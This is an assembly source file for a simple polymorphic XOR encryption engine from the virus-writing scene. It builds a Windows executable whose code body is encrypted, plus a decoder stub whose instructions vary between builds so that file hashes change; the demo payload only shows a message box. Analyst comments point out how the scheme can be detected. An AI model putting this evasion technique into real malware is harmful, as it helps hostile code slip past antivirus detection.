; .__
; _____ ____ ____ ____ | |__
; / \ / _ \_/ ___\/ _ \| | \ Poly Engine
;| Y Y ( <_> ) \__( <_> ) Y \
;|__|_| /\____/ \___ >____/|___| /
; \/ \/ \/
;
; [+] Simple Polymorphic PoC (code and decrypt routine)
; [+] 1-byte XOR random key
; [+] The engine can change the key, and some instructions (code and order)
; [+] This is not new, not advanced... Just for educational purposes
;
; By: SWaNk 2019 - Back in business, VX forever!
;
;https://pt.wikipedia.org/wiki/Mocó (Kerodon rupestris)

; Output is a 32-bit Windows PE image for the GUI subsystem (version 4.0);
; execution begins at the `start` label.
format PE GUI 4.0
entry start

; fasm Win32 (ANSI) headers, located through the INCLUDE environment variable.
; The stdcall and library macros used further down presumably come from this
; header set - confirm against the local include directory.
include "%include%/win32a.inc"
; This is the poly encryption macro (1-byte XOR).
; It XORs the code with a pseudo-random key between 0x00 and 0xFF, chosen at compilation time.
; This is just an example of how this can be done... Use your imagination to improve it.

; encrypt dstart,dsize
;   Assembly-time pass: XORs dsize bytes of the already generated output,
;   starting at address dstart, with the one-byte value `key`.
;     dstart - address of the first byte to transform
;     dsize  - number of bytes to transform
;   Nothing in this macro runs at run time: load/store read and patch the
;   output image while fasm is assembling. `key` is left defined as an
;   assembly-time variable; simplePoly embeds the same value in the run-time
;   decoder.
;
; Analyst notes:
;   - %t is fasm's assembly timestamp, so the key is time-derived rather than
;     random, and it has only 256 possible values.
;   - A key of 0x00 leaves the bytes unchanged (x xor 0 = x).
;   - The same byte value always maps to the same output byte, so the
;     transformed region can be recovered by trying each of the 256 keys.
macro encrypt dstart,dsize {
    local ..char                        ; scratch assembly-time variable, private to this expansion

    key = %t and 0xff                   ; low 8 bits of the assembly timestamp

    repeat dsize
        load ..char from dstart+%-1     ; % counts from 1, so %-1 is the byte offset
        ..char = ..char xor key
        store ..char at dstart+%-1      ; write the transformed byte back into the output
    end repeat
}
; The idea was to create a didactic macro. It splits the 1-byte key range in two (0xff / 2 = 0x7f).
;
; If the pseudo-random key is bigger than 0x7f, edx receives real_start first and then ecx receives
; code_size. Otherwise (key 0x7f or smaller) the order changes.
;
; If the pseudo-random key is bigger than 0x7f, edx is advanced with "inc edx"; otherwise
; with "add edx, 1".

; simplePoly
;   Emits the run-time decoder: XORs code_size bytes starting at real_start
;   with `key`, in place.
;   Registers: edx = pointer to the current byte, ecx = bytes remaining
;              (counted down by `loop`); flags are modified.
;   Depends on the assembly-time symbols key, real_start and code_size, all of
;   which are defined outside this macro.
;
; Analyst notes:
;   - Both `if` blocks test the same condition (key > 0x7f), so a build
;     contains one of exactly two instruction sequences.
;   - Apart from the XOR immediate and the two operand values, each sequence
;     is a fixed byte pattern, so a signature that wildcards those fields
;     covers every build.
;   - The decoder itself is never passed through encrypt; it sits in clear at
;     the entry point.
macro simplePoly {
    ; Choice 1: order of the two register loads (the register state afterwards is identical).
    if key > 0x7f
        mov edx,real_start
        mov ecx,code_size
    else
        mov ecx,code_size
        mov edx,real_start
    end if

    @@: xor byte [edx],key              ; decode one byte in place

    ; Choice 2: two different encodings of "advance edx by one".
    if key > 0x7f
        inc edx
    else
        add edx,1
    end if

    loop @B                             ; ecx -= 1; jump back to @@ while ecx != 0
}
; This macro generates the following instructions, starting at the entry point:

; mov edx,mocoh.401010      | The order of these instructions
; mov ecx,1C                | can change

; xor byte ptr ds:[edx],F4  | The key will change (in this case it is F4)
; inc edx                   | This can change to "add edx, 1"
; loop mocoh.40100A

;============================================================
; Code section. It is declared writeable because the decoder emitted by
; simplePoly rewrites the bytes after real_start in place at run time.
; An entry point inside a writable section is an anomaly that PE triage
; commonly checks for.
section ".code" code readable writeable
;============================================================
start:

    ; Run-time decoder. It refers to key and code_size, which are only assigned
    ; further down; this relies on fasm resolving forward references.
    simplePoly

real_start:

    ; Add your code here, start of encrypted code

    ; Demo payload: show a message box, then exit with code 0.
    stdcall [MessageBox],0,msg,title,MB_ICONASTERISK
    stdcall [ExitProcess],0

    ; end of encrypted code


; Assembly-time only: measure the region from real_start to the current address
; and XOR it in the output image. The display lines print to the assembler's
; console during the build; they are not part of the executable.
display "Encrypting this shit... "
code_size = $ - real_start
encrypt real_start,code_size
display "done",13,10
;============================================================
; Data section; the `import` flag marks it as also holding the import table.
; encrypt is applied only to the range after real_start in ".code", so the
; import table and both strings below are stored in the file unmodified.
section ".data" data readable writeable import
;============================================================
; Import table: the two DLLs referenced by the stdcall lines in ".code".
library kernel32,"kernel32.dll",user32,"user32.dll"
include "%include%/api/kernel32.inc"
include "%include%/api/user32.inc"

; NUL-terminated strings passed to MessageBox (caption and text).
title db "SWaNk 2019",0
msg db "compile 2 times and compare the hashes and decryption instruction bitches!",0